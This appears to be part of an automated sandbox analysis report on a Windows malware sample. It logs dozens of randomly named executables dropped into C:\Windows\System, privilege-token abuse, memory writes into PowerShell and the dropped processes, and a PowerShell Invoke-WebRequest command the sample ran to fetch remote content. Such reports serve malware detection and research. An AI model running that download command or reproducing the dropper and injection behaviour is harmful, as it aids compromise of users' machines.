File created C:\Windows\System\ixafBKw.exe C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\ZZpXlXw.exe C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\idbdsDm.exe C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\wEXBziW.exe C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\XAWfakT.exe C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\MobNNkQ.exe C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\oEPIIKl.exe C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\zTgrnEZ.exe C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\PGxMxCg.exe C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\ioiVeoa.exe C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\IHpbHcm.exe C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\aQGxAaX.exe C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\NPOcSjA.exe C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\sKzPiwY.exe C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\wEeQTzR.exe C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\lkeUcUe.exe C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\WEZfzyt.exe C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\ElXwKtM.exe C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\SupNVQP.exe C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\vTNWEGu.exe C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\gmuiwIY.exe C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\ByzeqVP.exe C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\pjbDcbY.exe C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\NEPOrtZ.exe C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\GFgHzLu.exe C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\lNjRNQG.exe C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\SeZtrOV.exe C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\mmTowoT.exe C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\EvOZoKH.exe C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\xzHFaRF.exe C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\XuDtrVP.exe C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\DQVENyn.exe C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\hoADlvq.exe C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\XrKhLNk.exe C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\IJDkAJG.exe C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\YWhxBHj.exe C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\XLAuXzo.exe C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\qhiuoXv.exe C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\PKrCdyH.exe C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\fiLGRNl.exe C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\rZcywZV.exe C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1116 wrote to memory of 2892 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1116 wrote to memory of 2892 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1116 wrote to memory of 448 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\ccnEONW.exe
PID 1116 wrote to memory of 448 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\ccnEONW.exe
PID 1116 wrote to memory of 956 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\LtrsFba.exe
PID 1116 wrote to memory of 956 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\LtrsFba.exe
PID 1116 wrote to memory of 3124 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\FkTHiwm.exe
PID 1116 wrote to memory of 3124 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\FkTHiwm.exe
PID 1116 wrote to memory of 1680 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\qehyiJd.exe
PID 1116 wrote to memory of 1680 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\qehyiJd.exe
PID 1116 wrote to memory of 4880 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\bKlqQNq.exe
PID 1116 wrote to memory of 4880 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\bKlqQNq.exe
PID 1116 wrote to memory of 4244 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\ATJYyhC.exe
PID 1116 wrote to memory of 4244 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\ATJYyhC.exe
PID 1116 wrote to memory of 696 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\uDSjORa.exe
PID 1116 wrote to memory of 696 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\uDSjORa.exe
PID 1116 wrote to memory of 3892 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\FuwmPqR.exe
PID 1116 wrote to memory of 3892 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\FuwmPqR.exe
PID 1116 wrote to memory of 1524 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\XCWhGge.exe
PID 1116 wrote to memory of 1524 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\XCWhGge.exe
PID 1116 wrote to memory of 4468 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\lyRAgRu.exe
PID 1116 wrote to memory of 4468 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\lyRAgRu.exe
PID 1116 wrote to memory of 3320 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\YnzVeLh.exe
PID 1116 wrote to memory of 3320 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\YnzVeLh.exe
PID 1116 wrote to memory of 2968 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\FLDVURt.exe
PID 1116 wrote to memory of 2968 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\FLDVURt.exe
PID 1116 wrote to memory of 5012 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\BfeyzeJ.exe
PID 1116 wrote to memory of 5012 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\BfeyzeJ.exe
PID 1116 wrote to memory of 2880 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\XuLMMnN.exe
PID 1116 wrote to memory of 2880 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\XuLMMnN.exe
PID 1116 wrote to memory of 2980 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\mERGCIb.exe
PID 1116 wrote to memory of 2980 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\mERGCIb.exe
PID 1116 wrote to memory of 3328 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\hsTWsvU.exe
PID 1116 wrote to memory of 3328 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\hsTWsvU.exe
PID 1116 wrote to memory of 5076 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\JWjrjXT.exe
PID 1116 wrote to memory of 5076 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\JWjrjXT.exe
PID 1116 wrote to memory of 3160 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\GGNowJC.exe
PID 1116 wrote to memory of 3160 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\GGNowJC.exe
PID 1116 wrote to memory of 3560 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\IkFKVgk.exe
PID 1116 wrote to memory of 3560 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\IkFKVgk.exe
PID 1116 wrote to memory of 4164 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\SeIvyYQ.exe
PID 1116 wrote to memory of 4164 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\SeIvyYQ.exe
PID 1116 wrote to memory of 1192 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\yGMzmaZ.exe
PID 1116 wrote to memory of 1192 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\yGMzmaZ.exe
PID 1116 wrote to memory of 4580 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\DtEpMZX.exe
PID 1116 wrote to memory of 4580 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\DtEpMZX.exe
PID 1116 wrote to memory of 3360 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\HzTawYv.exe
PID 1116 wrote to memory of 3360 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\HzTawYv.exe
PID 1116 wrote to memory of 1092 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\iyajVLp.exe
PID 1116 wrote to memory of 1092 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\iyajVLp.exe
PID 1116 wrote to memory of 540 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\wVrfVAm.exe
PID 1116 wrote to memory of 540 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\wVrfVAm.exe
PID 1116 wrote to memory of 1352 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\uIGnMmK.exe
PID 1116 wrote to memory of 1352 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\uIGnMmK.exe
PID 1116 wrote to memory of 5052 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\GnkVESL.exe
PID 1116 wrote to memory of 5052 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\GnkVESL.exe
PID 1116 wrote to memory of 4020 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\BsAWsvH.exe
PID 1116 wrote to memory of 4020 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\BsAWsvH.exe
PID 1116 wrote to memory of 988 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\fDyJZew.exe
PID 1116 wrote to memory of 988 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\fDyJZew.exe
PID 1116 wrote to memory of 3648 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\FJlmAjg.exe
PID 1116 wrote to memory of 3648 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\FJlmAjg.exe
PID 1116 wrote to memory of 3708 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\EYiVzfP.exe
PID 1116 wrote to memory of 3708 N/A C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe C:\Windows\System\EYiVzfP.exe

Processes

C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe

"C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "

C:\Windows\System\ccnEONW.exe

C:\Windows\System\ccnEONW.exe

C:\Windows\System\LtrsFba.exe

C:\Windows\System\LtrsFba.exe

C:\Windows\System\FkTHiwm.exe

C:\Windows\System\FkTHiwm.exe

C:\Windows\System\qehyiJd.exe

C:\Windows\System\qehyiJd.exe

C:\Windows\System\bKlqQNq.exe

C:\Windows\System\bKlqQNq.exe

C:\Windows\System\ATJYyhC.exe

C:\Windows\System\ATJYyhC.exe

C:\Windows\System\uDSjORa.exe

C:\Windows\System\uDSjORa.exe

C:\Windows\System\FuwmPqR.exe

C:\Windows\System\FuwmPqR.exe

C:\Windows\System\XCWhGge.exe

C:\Windows\System\XCWhGge.exe

C:\Windows\System\lyRAgRu.exe

C:\Windows\System\lyRAgRu.exe

C:\Windows\System\YnzVeLh.exe

C:\Windows\System\YnzVeLh.exe

C:\Windows\System\FLDVURt.exe

C:\Windows\System\FLDVURt.exe

C:\Windows\System\BfeyzeJ.exe

C:\Windows\System\BfeyzeJ.exe

C:\Windows\System\XuLMMnN.exe

C:\Windows\System\XuLMMnN.exe

C:\Windows\System\mERGCIb.exe

C:\Windows\System\mERGCIb.exe

C:\Windows\System\hsTWsvU.exe

C:\Windows\System\hsTWsvU.exe

C:\Windows\System\JWjrjXT.exe

C:\Windows\System\JWjrjXT.exe

C:\Windows\System\GGNowJC.exe

C:\Windows\System\GGNowJC.exe

C:\Windows\System\IkFKVgk.exe

C:\Windows\System\IkFKVgk.exe

C:\Windows\System\SeIvyYQ.exe

C:\Windows\System\SeIvyYQ.exe

C:\Windows\System\yGMzmaZ.exe

C:\Windows\System\yGMzmaZ.exe

C:\Windows\System\DtEpMZX.exe

C:\Windows\System\DtEpMZX.exe

C:\Windows\System\HzTawYv.exe

C:\Windows\System\HzTawYv.exe

C:\Windows\System\iyajVLp.exe

C:\Windows\System\iyajVLp.exe

C:\Windows\System\wVrfVAm.exe

C:\Windows\System\wVrfVAm.exe

C:\Windows\System\uIGnMmK.exe

C:\Windows\System\uIGnMmK.exe

C:\Windows\System\GnkVESL.exe

C:\Windows\System\GnkVESL.exe

C:\Windows\System\BsAWsvH.exe

C:\Windows\System\BsAWsvH.exe

C:\Windows\System\fDyJZew.exe

C:\Windows\System\fDyJZew.exe

C:\Windows\System\FJlmAjg.exe

C:\Windows\System\FJlmAjg.exe

C:\Windows\System\EYiVzfP.exe

C:\Windows\System\EYiVzfP.exe

C:\Windows\System\OyTwYWk.exe

C:\Windows\System\OyTwYWk.exe

C:\Windows\System\bhinvRW.exe

C:\Windows\System\bhinvRW.exe

C:\Windows\System\TGtlnzn.exe

C:\Windows\System\TGtlnzn.exe

C:\Windows\System\oHYewLx.exe

C:\Windows\System\oHYewLx.exe

C:\Windows\System\hHlloZd.exe

C:\Windows\System\hHlloZd.exe

C:\Windows\System\NNRuCtZ.exe

C:\Windows\System\NNRuCtZ.exe

C:\Windows\System\IzhjXLR.exe

C:\Windows\System\IzhjXLR.exe

C:\Windows\System\wGZuNdy.exe

C:\Windows\System\wGZuNdy.exe

C:\Windows\System\eGBvAVY.exe

C:\Windows\System\eGBvAVY.exe

C:\Windows\System\XCeRFYN.exe

C:\Windows\System\XCeRFYN.exe

C:\Windows\System\obiyzwz.exe

C:\Windows\System\obiyzwz.exe

C:\Windows\System\fuHUkcq.exe

C:\Windows\System\fuHUkcq.exe

C:\Windows\System\PegjuAD.exe

C:\Windows\System\PegjuAD.exe

C:\Windows\System\IUZKAvI.exe

C:\Windows\System\IUZKAvI.exe

C:\Windows\System\uOuNVwp.exe

C:\Windows\System\uOuNVwp.exe

C:\Windows\System\joLmFSP.exe

C:\Windows\System\joLmFSP.exe

C:\Windows\System\vbfchRa.exe

C:\Windows\System\vbfchRa.exe

C:\Windows\System\votVYzq.exe

C:\Windows\System\votVYzq.exe

C:\Windows\System\OamBMVr.exe

C:\Windows\System\OamBMVr.exe

C:\Windows\System\sEKxrYj.exe

C:\Windows\System\sEKxrYj.exe

C:\Windows\System\YmoAFHM.exe

C:\Windows\System\YmoAFHM.exe

C:\Windows\System\KAAOIyl.exe

C:\Windows\System\KAAOIyl.exe

C:\Windows\System\Bjchdih.exe

C:\Windows\System\Bjchdih.exe

C:\Windows\System\tUkGBEc.exe

C:\Windows\System\tUkGBEc.exe

C:\Windows\System\nQivZam.exe

C:\Windows\System\nQivZam.exe

C:\Windows\System\LdmxZuZ.exe

C:\Windows\System\LdmxZuZ.exe

C:\Windows\System\hbHeyPO.exe

C:\Windows\System\hbHeyPO.exe

C:\Windows\System\WDntoNw.exe

C:\Windows\System\WDntoNw.exe

C:\Windows\System\GAsHbDE.exe

C:\Windows\System\GAsHbDE.exe

C:\Windows\System\CHorVvx.exe

C:\Windows\System\CHorVvx.exe

C:\Windows\System\hLKDEsp.exe

C:\Windows\System\hLKDEsp.exe

C:\Windows\System\XuDtrVP.exe

C:\Windows\System\XuDtrVP.exe

C:\Windows\System\GIIZOQy.exe

C:\Windows\System\GIIZOQy.exe

C:\Windows\System\PGseVkt.exe

C:\Windows\System\PGseVkt.exe

C:\Windows\System\sKzPiwY.exe

C:\Windows\System\sKzPiwY.exe

C:\Windows\System\VCosYwn.exe

C:\Windows\System\VCosYwn.exe

C:\Windows\System\ZcjSIjf.exe

C:\Windows\System\ZcjSIjf.exe

C:\Windows\System\MmXVZLH.exe

C:\Windows\System\MmXVZLH.exe

C:\Windows\System\hgtDJwn.exe

C:\Windows\System\hgtDJwn.exe

C:\Windows\System\SgCWwbD.exe

C:\Windows\System\SgCWwbD.exe

C:\Windows\System\miDOVPf.exe

C:\Windows\System\miDOVPf.exe

C:\Windows\System\CQOPrZs.exe

C:\Windows\System\CQOPrZs.exe

C:\Windows\System\UMovNNA.exe

C:\Windows\System\UMovNNA.exe

C:\Windows\System\LiFlShK.exe

C:\Windows\System\LiFlShK.exe

C:\Windows\System\GFuJBRT.exe

C:\Windows\System\GFuJBRT.exe

C:\Windows\System\xgvEolh.exe

C:\Windows\System\xgvEolh.exe

C:\Windows\System\LWdTMyV.exe

C:\Windows\System\LWdTMyV.exe

C:\Windows\System\krGcctV.exe

C:\Windows\System\krGcctV.exe

C:\Windows\System\wLMfJFU.exe

C:\Windows\System\wLMfJFU.exe

C:\Windows\System\vNISgXK.exe

C:\Windows\System\vNISgXK.exe

C:\Windows\System\lyhTMBZ.exe

C:\Windows\System\lyhTMBZ.exe

C:\Windows\System\wocFswf.exe

C:\Windows\System\wocFswf.exe

C:\Windows\System\FkMHkow.exe

C:\Windows\System\FkMHkow.exe

C:\Windows\System\ZGUKNxy.exe

C:\Windows\System\ZGUKNxy.exe

C:\Windows\System\mLcjpMc.exe

C:\Windows\System\mLcjpMc.exe

C:\Windows\System\aPULyLp.exe

C:\Windows\System\aPULyLp.exe

C:\Windows\System\GFgHzLu.exe

C:\Windows\System\GFgHzLu.exe

C:\Windows\System\WWnfSmd.exe

C:\Windows\System\WWnfSmd.exe

C:\Windows\System\FLazKxF.exe

C:\Windows\System\FLazKxF.exe

C:\Windows\System\Jvmqbju.exe

C:\Windows\System\Jvmqbju.exe

C:\Windows\System\lNjRNQG.exe

C:\Windows\System\lNjRNQG.exe

C:\Windows\System\ZgbrqkQ.exe

C:\Windows\System\ZgbrqkQ.exe

C:\Windows\System\AwbUsMY.exe

C:\Windows\System\AwbUsMY.exe

C:\Windows\System\AkXlMdt.exe

C:\Windows\System\AkXlMdt.exe

C:\Windows\System\fgLMsCz.exe

C:\Windows\System\fgLMsCz.exe

C:\Windows\System\tTYtFLX.exe

C:\Windows\System\tTYtFLX.exe

C:\Windows\System\XgjPwzJ.exe

C:\Windows\System\XgjPwzJ.exe

C:\Windows\System\bjLtCyQ.exe

C:\Windows\System\bjLtCyQ.exe

C:\Windows\System\WKwnVpp.exe

C:\Windows\System\WKwnVpp.exe

C:\Windows\System\AdCSxYn.exe

C:\Windows\System\AdCSxYn.exe

C:\Windows\System\PpasdcE.exe

C:\Windows\System\PpasdcE.exe

C:\Windows\System\YWhxBHj.exe

C:\Windows\System\YWhxBHj.exe

C:\Windows\System\OrtFKVQ.exe

C:\Windows\System\OrtFKVQ.exe

C:\Windows\System\bPQrAuL.exe

C:\Windows\System\bPQrAuL.exe

C:\Windows\System\kRhBOZJ.exe

C:\Windows\System\kRhBOZJ.exe

C:\Windows\System\zJJUqbY.exe

C:\Windows\System\zJJUqbY.exe

C:\Windows\System\kUZXRgq.exe

C:\Windows\System\kUZXRgq.exe

C:\Windows\System\EPMyKtP.exe

C:\Windows\System\EPMyKtP.exe

C:\Windows\System\yxabiko.exe

C:\Windows\System\yxabiko.exe

C:\Windows\System\bIhdzRT.exe

C:\Windows\System\bIhdzRT.exe

C:\Windows\System\vKQGRMb.exe

C:\Windows\System\vKQGRMb.exe

C:\Windows\System\bdTZBsj.exe

C:\Windows\System\bdTZBsj.exe

C:\Windows\System\JQsboIt.exe

C:\Windows\System\JQsboIt.exe

C:\Windows\System\DqzuerF.exe

C:\Windows\System\DqzuerF.exe

C:\Windows\System\BRVJvyK.exe

C:\Windows\System\BRVJvyK.exe

C:\Windows\System\rHtBJrj.exe

C:\Windows\System\rHtBJrj.exe

C:\Windows\System\iesTOTc.exe

C:\Windows\System\iesTOTc.exe

C:\Windows\System\NKQDFjq.exe

C:\Windows\System\NKQDFjq.exe

C:\Windows\System\HGCiXBf.exe

C:\Windows\System\HGCiXBf.exe

C:\Windows\System\exlhzdf.exe

C:\Windows\System\exlhzdf.exe

C:\Windows\System\FyXaWQe.exe

C:\Windows\System\FyXaWQe.exe

C:\Windows\System\TLWbaks.exe

C:\Windows\System\TLWbaks.exe

C:\Windows\System\eQyNqow.exe

C:\Windows\System\eQyNqow.exe

C:\Windows\System\cKXcjcp.exe

C:\Windows\System\cKXcjcp.exe

C:\Windows\System\oAaEJlt.exe

C:\Windows\System\oAaEJlt.exe

C:\Windows\System\CrcxrIW.exe

C:\Windows\System\CrcxrIW.exe

C:\Windows\System\IarGAAG.exe

C:\Windows\System\IarGAAG.exe

C:\Windows\System\PaKCOcM.exe

C:\Windows\System\PaKCOcM.exe

C:\Windows\System\EyDzQjN.exe

C:\Windows\System\EyDzQjN.exe

C:\Windows\System\jfNJepZ.exe

C:\Windows\System\jfNJepZ.exe

C:\Windows\System\IJPFEOd.exe

C:\Windows\System\IJPFEOd.exe

C:\Windows\System\JCIyrLt.exe

C:\Windows\System\JCIyrLt.exe

C:\Windows\System\raaSrHU.exe

C:\Windows\System\raaSrHU.exe

